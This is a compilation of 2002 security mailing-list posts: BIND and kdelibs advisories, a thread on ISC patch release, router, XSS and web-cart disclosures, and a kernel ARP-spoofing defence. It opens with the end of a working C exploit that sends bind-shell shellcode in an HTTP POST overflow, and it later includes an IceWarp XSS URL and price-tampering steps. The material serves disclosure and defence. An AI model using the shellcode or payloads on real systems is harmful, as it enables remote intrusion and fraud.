** My World: http://x82.i21c.net
**
*/

#include 
int main(/* args? */)
{ 
int shadd2r;
char b1ndsh[] = /* 129byte bindshellcode */
"\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
"\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
"\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
"\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
"\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
"\377\377/bin/sh";
//--- POST &shellcode ---//
fprintf(stdout,"POST ");
for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
{/* rEDhAT Default: 0x804e482,
Debian Address? */
fprintf(stdout,"\202\344\004\b");
}
fprintf(stdout,"\r\n");
//--- NOP,shellcode ---//
for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
{/* ...S;;; */
fprintf(stdout,"S");
}
fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}

=== eof ===


0x04. Patch


=== api.patch ===

--- api.c   Sat Nov  9 20:06:30 2002
+++ api.patch.c Sat Nov  9 20:05:33 2002
@@ -867,7 +867,7 @@
httpContent *entry;
 
server->response.responseLength = 0;
-   strcpy(dirName, httpdRequestPath(server));
+   strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL);
cp = rindex(dirName, '/');
if (cp == NULL)
{

=== eof ===


P.S: Sorry, for my poor english.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
  xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
 My World: http://x82.i21c.net

GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--


-- 
Get your free email from http://www.hackermail.com

Powered by Outblaze

FreeBSD Security Advisory FreeBSD-SA-02:43.bind

[FreeBSD Security Advisories]

-BEGIN PGP SIGNED MESSAGE-

=
FreeBSD-SA-02:43.bind   Security Advisory
  The FreeBSD Project

Topic:  multiple vulnerabilities in BIND

Category:   core
Module: bind
Announced:  2002-11-14
Credits:ISS X-Force <[EMAIL PROTECTED]>
Affects:All released versions of FreeBSD
Corrected:  2002-11-14 05:15:15 UTC (RELENG_4)
2002-11-14 02:05:57 UTC (RELENG_4_7)
2002-11-14 03:18:41 UTC (RELENG_4_6)
2002-11-14 04:05:12 UTC (RELENG_4_5)
2002-11-14 05:11:57 UTC (RELENG_4_4)
FreeBSD only:   NO

I.   Background

BIND 8 is an implementation of the Domain Name System (DNS) protocols.

II.  Problem Description

ISS X-Force has disclosed several vulnerabilities affecting BIND 8.
The names which ISS has given each vulnerability are used in this
advisory.  The first is a buffer overflow in the BIND 8 code
responsible for creating DNS responses which include SIG resource
records (RRs) from its internal cache (`BIND SIG Cached RR Overflow
Vulnerability').  The second is an error in the BIND 8 code which
constructs a response to an EDNS query (i.e. a query containing OPT
RRs) with a large packet size.  A miscalculation triggers an assertion
failure (`BIND OPT DoS').  The third is a problem in the verification
of SIG RR expiry times, which can result in a null pointer dereference
(`BIND SIG Expiry Time DoS').

III. Impact

BIND SIG Cached RR Overflow Vulnerability:  A remote attacker may be
able to cause a name server with recursion enabled to execute
arbitrary code with the privileges of the name server process.

BIND OPT DoS and BIND SIG Expiry Time DoS: A remote attacker may be
able to cause the name server process to crash.

IV.  Workaround

BIND 9 is not affected by these vulnerabilities.  For those who have
the option, upgrading to BIND 9 is recommended.  BIND 9 is available
in the FreeBSD Ports Collection (ports/net/bind9).  The bind9 port
includes migration notes in /usr/local/share/doc/bind9/misc/migration.

Name servers with recursion disabled are not vulnerable to the `BIND
SIG Cached RR Overflow Vulnerability' nor to the `BIND SIG Expiry Time
DoS'.  To disable recursion, edit the BIND 8 configuration file
(default path /etc/namedb/named.conf) to add `recursion no;' and
`fetch-glue no;' to the options statement.  e.g.,

   options {
   recursion no;
   fetch-glue no;
   /* ... other options ... */
   };

Restart the name server after editing the configuration file.

Restricting recursion to only your own organization's clients (by
means of the `allow-recursion' directive) limits, but does not
eliminate, the impact of these vulnerabilities by making them harder
to exploit.  Restricting recursion in this fashion is generally
recommended.  To restrict recursion, edit the BIND 8 configuration
file to include an `allow-recursion' statement and an address list
appropriate for your organization.  e.g.,

options {
allow-recursion { 10.0.0.0/8; };
/* ... other options ... */
};

Running BIND 8 as a non-privileged user (rather than as the superuser)
may reduce the impact should the name server be compromised via the
`BIND SIG Cached RR Overflow Vulnerability'.  Running as a
non-privileged user is generally recommended.  Likewise, running BIND
8 in a chroot environment may reduce the impact and is generally
recommended.

V.  Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.7-STABLE; or to the RELENG_4_7,
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the
correction date (4.7-RELEASE-p2, 4.6.2-RELEASE-p5, 4.5-RELEASE-p23,
4.4-RELEASE-p30).

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, 4.5,
4.6, and 4.7 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:43/bind.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:43/bind.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/named
# make depend && make && make install
# cd /usr/src/libexec/named-xfer
# make depend && make && make install

After upgrading or patching your system, you must restart named.
Execute the following command as root:

# ndc restart

VI.  Correction details

Path Revision
  Branch
- -
src/contrib/bind/CHANGES
  RELENG_41.1.1.7.2.8
  RELENG_4_7  1.1.1.7.2.7.2.1
  RELENG_4_6 

GLSA: kdelibs

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200211-004
- - 

PACKAGE : kdelibs
SUMMARY : rlogin.protocol and telnet.protocol URL KIO Vulnerability
  resLISa / LISa Vulnerabilities
DATE    : DATUM
EXPLOIT : local & remote

- - 

from KDE advisory 2002-1 :

The implementation of the rlogin protocol in all of the affected
systems, and the implementation of the telnet protocol in affected
KDE 2 systems, allows a carefully crafted URL in an HTML page,
HTML email or other KIO-enabled application to execute arbitrary
commands on the system using the victim's account on the
vulnerable machine.

The vulnerability potentially enables local or remote attackers
to compromise a victim's account and execute arbitrary commands
on the local system with the victim's privileges, such as erasing
files, accessing data or installing trojans.

Read the full advisory at
http://www.kde.org/info/security/advisory-2002-1.txt

from KDE advisory 2002-2 :

The resLISa daemon contains a buffer overflow vulnerability which
potentially enables any local user to obtain access to a raw socket
if 'reslisa' is installed SUID root.  This vulnerability was
discovered by the iDEFENSE security team and Texonet.

The lisa daemon contains a buffer overflow vulnerability which
potentially enables any local user, as well any any remote attacker
on the LAN who is able to gain control of the LISa port (7741 by
default), to obtain root privileges.

In addition, a remote attacker potentially may be able to gain
access to a victim's account by using an "lan://" URL in an HTML
page or via another KDE application.  These vulnerabilities were
discovered by Olaf Kirch at SuSE Linux AG.

Read the full advisory at
http://www.kde.org/info/security/advisory-2002-2.txt

More information is available at
http://www.idefense.com/advisory/11.11.02.txt

SOLUTION

It is recommended that all Gentoo Linux users who are running
kde-base/kdelibs-3.0.4 and earlier update their systems as follows:

emerge rsync
emerge kdelibs
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
[EMAIL PROTECTED]
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE902/SfT7nyhUpoZMRAg8wAKCcPSEbh+xXPVn9CdVTTJLoaXWymwCfQGWq
OP1MzPDSrSIHbJO6rn9Naig=
=YJX0
-END PGP SIGNATURE-

Re: Bind 8 bug experience

[Glen Bishop]

bind 4 and 8 patches are now available which appeared late last night

http://www.isc.org/products/BIND/patches/

-glen

>
> Three bugs in bind 4 and 8 were announced this morning, November 12. At
> least one has the possibility of arbitrary code execution, and
> the ISC web site lists it as 'Serious'.
>
> At 13:02 CST this afternoon per the ISC announcement, about an hour
> after receiving the bug announcement, I requested bind 8 patches
> from Lynda McGinley, Executive Director of ISC.  I received a
> response from her roughly 8 hours later this evening that I had been
> added to the patch announce list.  My thanks to Lynda for that, but she
> did not give direct information on where to get the patches, and I have
> received nothing from the patch announce list.  I don't know when I can
> expect to receive anything -- tonight, next week, or next month?
>
> Earlier today I asked Lynda a question: why were patches not made
> available at the time of the announcement?  Paraphrasing her
> response, since I have not asked her permission to forward verbatim what
> she wrote, she indicated that those in the bind forum that had
> subscribed to the early security notification had the patches
> readily available.  She indicated that ISC wanted to make sure that the
> right audience had the patches first.
>
> I clarified to her that my understanding is that the early
> notification subscription was for the purpose of vendors being
> notified before public announcement so they could get software
> packages updated and available prior to announcement.  Lynda
> affirmed this.
>
> My response to her was that the right audience should change in
> relation to announcement.
>
> Those that paid to be notified early had that expectation fulfilled.
> Before announcement, per current ISC practice, they are the right
> audience, and they got bind 4 and 8 patches.
>
> As of the moment of announcement, the right audience should be
> expanded to include all those placed at risk because they use the
> software.  Failure to make the patches available suddenly puts many
> systems at rapidly increasing risk.
>
> I have not yet heard a satisfactory answer why were patches not
> publicly available when this announcement was made.  More troubling, why
> has ISC not released the patches yet?  As of 23:44 CST, about 12 hours
> after the first announcement, nothing beyond 8.3.3 is
> available in the normal directories on ftp.isc.org, yet updates
> clearly exist.
>
> Per the ISS announcement, to the best of their knowledge no crackers
> knew of these bugs, nor were there exploits available.  From the
> moment of the announcement, that is no longer true.  If these were truly
> unknown bugs, there was time to do this right, to fix the bugs and get
> the updates available.  That time advantage is eroding very rapidly.
>
> I had held off upgrading to bind 9 because of its newness. Observing its
> release history, in my assessment it has not been any better
> than bind 8.  There have been too many beta, release candidate and
> security fixes to be considered stable.  Meanwhile, ISC's policies left
> me with no real choice.  I've dropped everything else this
> evening and have upgraded to bind 9.
>
> I don't know of a similar incident when the known patches to such a
> serious problem were withheld by a software provider.  This is
> particularly true in the case of software of which its security and
> stability are the most crucial to the operation of the Internet.
>
> This raises troubling questions about the future management of bind.
> What will happen when the next bind 9 bug hits?
>
>-- Michael

Re: Bind 8 bug experience

[Olaf Kirch]

On Wed, Nov 13, 2002 at 12:04:31PM -0800, Jeremy C. Reed wrote:
> But I see the patches were made October 30 (if the dates are reliable).

In fact I believe ISC have been sitting on this for almost a month.
The CVE IDs were assigned October 16, and I have reason to believe that
they learned of this no later than October 23.

Members of BIND Forum were notified last week, from what I'm told.

In my opinion, the main reason for ISC to use this method of distributing
the patches rather than going through established channels (such as
CERT) was to be able to convince software vendors and other bodies
using/distributing BIND to become a member of BIND forum. I don't
know if that worked out, but I have my doubts.

>From my experience of the past two days, I believe they did not expect there
to be such a demand for the patches. I know that most Linux distributors,
as well as some BSD folks, tried to reach someone at ISC for 36 hours,
without success (we were notified of the issue on Tuesday, approx
14 hours ahead of the publication of ISC's and ISS's announcements).
Some of that may be blamed on technical issues (I found it curious that
PGP-signed messages never got through, while unsigned messages did),
but probably not all of it.

The whole thing was a mess. Timelines for the publication of _anything_,
from advisories to patches to updates, were either non-existing or
shifting all the time.

I don't have very fond memories of the OpenSSH update of a few months
ago, but it is worth noting that the SSH folks gave everyone a chance to
cover their bases first, and then went on to disclose details of the bug.

We all have our little complaints about CERT now and then, and I also
think that CERT could improve in this way or that. But incidents like this
one also serve to remind that independent (and financially independently)
bodies do make a very valuable contribution to the security community
as a whole. Things could be so much worse...

Olaf
-- 
Olaf Kirch |  Anyone who has had to work with X.509 has probably
[EMAIL PROTECTED]   |  experienced what can best be described as
---+  ISO water torture. -- Peter Gutmann

Default SNMP community in Surecom Broadband Router

[Andrei Mikhailovsky]

Arhont Ltd. - Information Security

Arhont Advisory by: Andrei Mikhailovsky
(www.arhont.com)
Advisory:   Surecom Broadband Router 
Router Model Name:  EP-4501
Model Specific: Other models might be
vulnerable
Manufacturer site:  http://www.surecom.com.tw
Manufacturer contact:   [EMAIL PROTECTED]
Contact Date:   25/10/2002

DETAILS:

While performing a general penetration testing of a
network, we have found a security vulnerability in the
Surecom Broadband Router EP-4501.

The default router installation enables SNMP (Simple
Network Management Protocol) server with default
community names for read and read/write access.  

The community name: public 

Allows read access to the mentioned device, providing
enumeration and gathering of sensitive network
information.  

The community name: secret 

Allows read/write access to device, thus allowing
restart and change of the network settings of the
broadband router.  The SNMP server is enabled by
default from the LAN and WAN interfaces.

Impact: This vulnerability allows LAN and internet
malicious attackers to retrieve and change network
settings of the router.

Risk Factor: High

Possible Solutions:  Disable default SNMP
implementation, or change default community names.

According to the Arhont Ltd. policy, all of the found
vulnerabilities and security issues will be reported to
the manufacturer 7 days before releasing them to the
public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this
issue, please do not hesitate to contact Arhont team.


Regards,

Andrei Mikhailovsky
Arhont Ltd.
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key:   0x178F548C

RE: A technique to mitigate cookie-stealing XSS attacks

[Ulf Harnhammar]

On Wed, 13 Nov 2002, Steven M. Christey wrote:

> Being able to place arbitrary HTML into an intermediate web page is
> dangerous for other reasons (this is sometimes called "HTML
> injection," but I view it as another flavor of XSS).  For example,
> this would allow attackers to use META-REFRESH style attacks to
> redirect victims away from the intended web site.

..or to redirect victims to a script on the intended web site that does
something (i e, sending mails or posting Usenet messages under the
victim's name). It's not just about stealing cookies.

// Ulf Harnhammar
   VSU Security
   [EMAIL PROTECTED]

arp spoofing defence

[Ilya Teterin]

Here is a patch http://securitylab.ru/_tools/antidote2.diff.gz for linux
kernel (2.4.18 and .19 tested) to resisting ARP spoofing.

If applied, it brings a new sysctl parameter:

net.ipv4.neigh..arp_antidote

that defines kernel behaviour when changes in correspondence between MAC
and IP are detected.

Parameter value 0 corresponds standart behaviour, ARP cache will be
silently updated.

Value=1..3 corresponds "verification" behaviour. Kernel will send ARP
request to test if there is a host at "old" MAC address. If such
response received it lets us know than one IP pretends to have
several MAC addresses at one moment, that probably caused by ARP spoof
attack.

Value=1 - just report attack and ignore spoofing attempt.
Value=2 - ARP cache record will be marked as "static" to prevent attacks
in future.
Value=3 - ARP cache record will be marked as "banned", no data will be
delivered to attacked IP anymore, untill system administrator unban
ARP record updating it manually.

---
buggzy

[ESA-20021114-029] BIND buffer overflow, DoS attacks.

[EnGarde Secure Linux]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


++
| EnGarde Secure Linux Security Advisory   November 14, 2002 |
| http://www.engardelinux.org/  ESA-20021114-029 |
||
| Packages: bind-chroot, bind-chroot-utils   |
| Summary:  buffer overflow, DoS attacks.|
++

  EnGarde Secure Linux is a secure distribution of Linux that features
  improved access control, host and network intrusion detection, Web
  based secure remote management, e-commerce, and integrated open source
  security tools.

OVERVIEW
- 
  Several vulnerabilities were found in the BIND nameserver.  The
  vulnerabilities, discovered by ISS, range from buffer overflows to
  denial of service (DoS) attacks.

  The summaries below are from the ISS advisory which may be found at:

http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469

  * CAN-2002-1219 -- BIND SIG Cached RR Overflow Vulnerability

"A buffer overflow exists in BIND 4 and 8 that may lead to remote
 compromise of vulnerable DNS servers. An attacker who controls any
 authoritative DNS server may cause BIND to cache DNS information
 within its internal database, if recursion is enabled. Recursion is
 enabled by default unless explicitly disabled via command line
 options or in the BIND configuration file. Attackers must either
 create their own name server that is authoritative for any domain,
 or compromise any other authoritative server with the same criteria.
 Cached information is retrieved when requested by a DNS client. There
 is a flaw in the formation of DNS responses containing SIG resource
 records (RR) that can lead to buffer overflow and execution of
 arbitrary code."

  * CAN-2002-1220 -- BIND OPT DoS

"Recursive BIND 8 servers can be caused to abruptly terminate due to
 an assertion failure. A client requesting a DNS lookup on a
 nonexistent sub- domain of a valid domain name may cause BIND 8 to
 terminate by attaching an OPT resource record with a large UDP
 payload size. This DoS may also be triggered for queries on domains
 whose authoritative DNS servers are unreachable."

  * CAN-2002-1221 -- BIND SIG Expiry Time DoS

"Recursive BIND 8 servers can be caused to abruptly terminate due to a
 null pointer dereference. An attacker who controls any authoritative
 name server may cause vulnerable BIND 8 servers to attempt to cache
 SIG RR elements with invalid expiry times. These are removed from the
 BIND internal database, but later improperly referenced, leading to a
 DoS condition."

  All users should upgrade as soon as possible.

SOLUTION
- 
  Users of the EnGarde Professional edition can use the Guardian Digital
  Secure Network to update their systems automatically.

  EnGarde Community users should upgrade to the most recent version
  as outlined in this advisory.  Updates may be obtained from:

ftp://ftp.engardelinux.org/pub/engarde/stable/updates/
http://ftp.engardelinux.org/pub/engarde/stable/updates/

  Before upgrading the package, the machine must either:

a) be booted into a "standard" kernel; or
b) have LIDS disabled.

  To disable LIDS, execute the command:

# /sbin/lidsadm -S -- -LIDS_GLOBAL

  To install the updated package, execute the command:

# rpm -Uvh files

  You must now update the LIDS configuration by executing the command:

# /usr/sbin/config_lids.pl

  To re-enable LIDS (if it was disabled), execute the command:

# /sbin/lidsadm -S -- +LIDS_GLOBAL

  To verify the signatures of the updated packages, execute the command:

# rpm -Kv files

UPDATED PACKAGES
- 
  These updated packages are for EnGarde Secure Linux Community
  Edition.

  Source Packages:

SRPMS/bind-chroot-8.2.6-1.0.29.src.rpm
  MD5 Sum: 3c845d09bcbe9b07e5395d75a8686689

  Binary Packages:

i386/bind-chroot-8.2.6-1.0.29.i386.rpm
  MD5 Sum: 0c1daf47be94ae0fd5a29e4007bf68c2

i386/bind-chroot-utils-8.2.6-1.0.29.i386.rpm
  MD5 Sum: 58e0e54d895b8dc3c6f6b5e9228912fb

i686/bind-chroot-8.2.6-1.0.29.i686.rpm
  MD5 Sum: 84cb58f02d228859a2fbda3ed1b46dd5

i686/bind-chroot-utils-8.2.6-1.0.29.i686.rpm
  MD5 Sum: 20fb3e4a34cecb431511308afe027941

REFERENCES
- --
  Guardian Digital's public key:
http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY

  BIND's Official Web Site:
http://www.isc.org/products/BIND/

  Security Contact:   [EMAIL PROTECTED]
  EnGarde Advisories: http://www.engardelinux.org/advisories.html

- --
$Id: ESA-20021114-029-bind-chroot,v 1.4 2002/11/14 10:02:51 

Well known flaw in web cart software remains wide open

[whitehat2004]

WhiteHat Security Advisory 1004
November 11, 2002

===
Problem Description
===
Vulnerable web shopping cart software passes prices between web pages 
using hidden form fields.  What this means is that every time a customer 
adds something to their shopping cart, the cart checks HTTP-POSTed data 
coming from the CUSTOMER computer to determine the price.  The problem is 
that the user can alter this data before sending it to your web server, 
allowing the user to set the price of his or her choice.

This hack is already widely known in the WhiteHat and BlackHat 
communities.  I hope to spread awareness to those site owners who are 
trusting their stores to faulty software.

===
HOW THIS HACK WORKS
===
Visit some vulnerable site and look at a set of expensive "FooBars". 
Install an simple IE plugin that allows you to edit HTTP POST data before 
submission and then change the hidden form field containing the price of 
the FooBars from $575 to $10.

Now, send the edited data and look at the confirmation page. 

==
Impact
==
Malicious users may set their own prices at any site using vulnerable 
cart software.  If prices are not hand-verified, vulnerable sites lose 
revenue.

=
Mitigating Factors / Vendor Snake Oil
=
1> Some vendors think it is sufficent to change from HTTP GET requests to 
HTTP POSTs. 
Insufficent.  Handcrafted-HTTP requests using PERL, C++, etc allow the 
user to fake a post.

2> Checking HTTP Referer (http://www.cart32.com/kbshow.asp?article=C051)
Insufficent.  HTTP Referer is a header sent FROM the client and thus 
should not be trusted.  User can either fake header or use a trivial IE 
plugin which allows on-the-fly POST editing.  Writing such a plugin took 
the author 5 hours.  The widely available test proxy known as Achilles 
can also execute this attack.

===
Vendors Affected and Notification Dates
===
JustAddCommerce - Notified July 15
Cart32  - Notified July 8
Approximately 50% of the hand-coded carts tested- Notified at 
assorted dates/times

Related note [1]: PayPal does not claim that its donations are secure, 
and thus I do not consider them vulnerable.  Prices are passed in URL.
https://www.paypal.com/cgi-bin/webscr?amount=9.99&return=http%
3A//www.thisistrue.com/thanks.html&item_name=Whatever

Related note [2]: A number of vendors have protected their item price 
data, but not their shipping charge data.  When submitting a shipping 
charge of -40, the user receives a $40 discount on their order.

=
Where to go from here
=
Find out if you are vulnerable.  Review your code or your HTTP traffic to 
determine where the prices are coming from.

If you find you are vulnerable:
1> Immediately begin verifying orders and prices.
2> Call your vendor and request a patch
3> Read the Web Security section of "Writing Secure Code" or similar to 
figure out how to fix this class of vulnerability.

===
How to prevent this problem
===
Cart software should NEVER trust ANY data coming from the client.  This 
includes HTTP Headers.  If the cart must rely on HTTP POSTed data, it 
should be delivered in a cryptographically secure manner.

IceWarp 3.4.5 XSS *AGAIN*

[DarC KonQuesT]

DarC KonQuesT IceWarp 3.4.5 XSS Release

Product: IceWarp Webmail 3.4.5
Vendor: IceWarp Software - E-mail: [EMAIL PROTECTED]
Web: www.icewarp.com
Problem: Cross Site Scripting
Severity: Mild
Operating System(s): Tested against Win2k
Discovered: October 29, 2002
Vendor Notified: October 29, 2002
Public Release: Now - November 11, 2002

Preface:
Okay, here's what happened...before my original release of the Icewarp
3.3.3 Cross-Site Scripting bug I contacted IceWarp about it.  After a bit of
discussion, one of the developers established contact with me again and
stated that he would fix the problem.  And I quote:
"Hi DarC
Thanks for the explanation. I'll fix it :)
Cheers"
The above from developer Jakub Klos.  Unfortunately he either
misunderstood or just did not fix the problem.  When the mail server I use
updated to IceWarp version 3.4.5 I noticed the bug still existed.
After contacting IceWarp with the bug (again) I was notified that it had
been sent to their developers (again) and later received the following reply
(again):
"Hi,
Problem solved..
Thanks"   -this from Adam Paclt
Hmmseem familiar??
Anyway, I'm not going to go over the entire advisory again because it is
EXACTLY the same, no difference.  So, I've attached the original advisory
below.

Cleaning up loose ends:
1)  YES! I KNOW! This is very difficult to exploit, I knew/know/will
continue to know this.  No need to contact me and let me know...because I
KNOW!
2)  You, yeah you behind the anonymous remailer harping on me and my
handle...True, I hide behind a handle, but YOU hide behind an anonymous
remailer.  ESAD you fucking hypocrite.

Later on, and have fun,

-DarC KonQuesT
Ringleader -(DiR)-
United States of America

Greets:  Christina,  HaXXuS 101, oO  Bizurke  Oo, st3v3.



-ORIGINAL ADVISORY
BELOW---
DarC KonQuesT XSS Release-

Product: IceWarp Webmail 3.3.3 (tested, others possibly vulnerable)
Vendor: IceWarp Software - E-mail: [EMAIL PROTECTED]
Web: www.icewarp.com
Problem: Cross Site Scripting
Severity: Mild-Moderate
Operating System(s): Tested against Win2k but all others if objects are
handled the same way.
Discovered: July 28, 2002
Vendor Notified: August 4, 2002
Public Release: Now - August 24

Background:
IceWarp Webmail is a nice webmail daemon that "is a full featured top
quality web mail solution which works with any mail server and lets you
access your email office remotely from any browser on the Internet or your
local network" (IceWarp.com). Web Mail runs on Windows XP/2000/NT/9X/ME,
supports SMTP/POP3/IMAP4/HTTP Internet protocols and has a spell checker,
remote web administration, any attachment support, private and shared
address books, groups, signatures, multiple mail server support and many
other powerful options (IceWarp.com). According to their site it was first
officially released on March 6, 2000.

Problem:
IceWarp has a nifty little feature where your address book appears as a
dropdown menu next to the message's "To:", "Cc:", and "Bcc:" fields which
allows sending a message to a contact in your address book very easy. When
IceWarp loads your address book into these dropdown menus it doesn't
sanitize the "Full Name" segment so malicous code (or any code, I don't
care) can be placed into this field and it will be executed whenever the
user loads the page to write a new message. However, since the dropdown menu
appears thrice (beside each field) the code will execute 3 times.
One problem with providing a link to automatically enter this data into the
address book is that IceWarp uses ID numbers to keep track of the logged in
user. If you do not know this number then IceWarp lists the user as not
logged in. Therefore it becomes more difficult to execute a XSS attack. This
number is randomly generated (I think), and changes everytime the user logs
in. This number can be seen in the URL or many places in the code of the
page.

Code from inbox:

http://:32000/mail/readmail.html?folder=inbox&get=1&id=e
68972360786c64b3aa14dc0f60b1aa6
You can see the ID number listed beside 'id='

Exploit (almost):
A URL can be crafted easily which will fill in the values on the 'Add
Address' page just by viewing the code. The one I used is as follows:
NOTE: I used some encoding for the spaces but none was necessary for the
page I tested on. However, encoding the entire URL would be a good way to
disguise the intentions of it.

http://:32000/mail/addressaction.html?id=&newaddress=1&addressname=alert('DarCNesS%20Overwhelms')&[EMAIL PROTECTED]

The problem with this is that it will go to the page (if you know the ID#),
and fill in the required fields. However it will not submit the form. I'll
leave this for someone else to figure out. An easier way would be if the
page used CGI or PHP where the form could be submitted solely through the
URL 

Re: When scrubbing secrets in memory doesn't work

[Jan Echternach]

On Fri, Nov 08, 2002 at 05:23:34PM +0100, Michael Zimmermann wrote:
> Not to declare the intermediate storage for sensitive
> data as 'volatile' is a coding flaw. An esily overlooked
> one, yes, but nevertheless... Like forgetting to protect
> critical code with semaphores.

'volatile' isn't sufficient to be safe.  In fact, there's no way to be
sure that some C code doesn't leave copies of sensitive data around,
because there's nothing in the C standard that forbids the compiler to
keep copies of data.  'volatile' only forbids certain usages of that
data (provided that the implementation defined aspects of 'volatile'
are defined in a sane way).

Typical examples of such copies are temporary data while evaluating
expressions, and copies of processor registers on the stack that are often
required by the ABI.

For example, take gcc-3.0.4 on Linux/ix86, optimizations turned off,
and the following code:

| #include 
| extern void zero (volatile void *, size_t);
| void foo3 (volatile unsigned long *keyl,
| volatile unsigned long *keyr)
| {
| volatile unsigned long keyx;
| keyx = (*keyl + *keyr) * (*keyl - *keyr)
|- (*keyl ^ *keyr) * (~*keyl * ~*keyr);
| bar3 (&keyx);
| zero (&keyx, sizeof keyx);
| }

It's compiled to this assembly code (only a small snippet before the
call to bar3()):

| movl%ebx, %eax
| movl%eax, -8(%ebp)
| subl$12, %esp
| leal-8(%ebp), %eax
| pushl   %eax
| callbar3

The value of keyx is in register %ebx.  If bar3() uses %ebx internally
(which it probably does if it is non-trivial), the first thing after
setting up the stack frame will be saving the old value of %ebx
(i.e. keyx) on the stack.

-- 
Jan   fortune: can't load library '/libc.so.4'
  No such library.